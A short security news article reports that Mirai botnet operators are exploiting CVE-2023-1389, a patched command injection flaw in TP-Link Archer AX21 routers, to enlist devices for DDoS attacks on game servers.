Threat actors behind the Mirai botnet are actively exploiting a recently patched TP-Link Archer WiFi router vulnerability, the Zero Day Initiative (ZDI) threat hunting team warns.
Tracked as CVE-2023-1389, the flaw is an unauthenticated command injection flaw in the local API of the web management interface of the TP-Link Archer AX21 router that allows a remote attacker to execute arbitrary commands on the target system by passing specially crafted data to the application. TP-Link addressed the vulnerability in March 2023 in a new firmware update.
First exploitation attempts have been observed starting April 11, 2023 mostly targeting devices in Eastern Europe, with infections rapidly spreading worldwide.
ZDI said that a new version of the Mirai malware botnet now exploits the vulnerability to gain access to the device. It then executes the appropriate binary payload for the target system architecture to ensnare the device into its botnet.
The observed version of Mirai appears to be focused on launching DDoS attacks against game servers, as it comes with an array of functions, including the ability to launch attacks against Valve Source Engine (VSE).
“Seeing this CVE being exploited so quickly after the patch being released is a clear demonstration of the decreasing “time-to-exploit" speed that we continue to see across the industry. That said, this is nothing new for the maintainers of the Mirai botnet, who are known for quickly exploiting IoT devices to maintain their foothold in an enterprise,” the ZDI team said.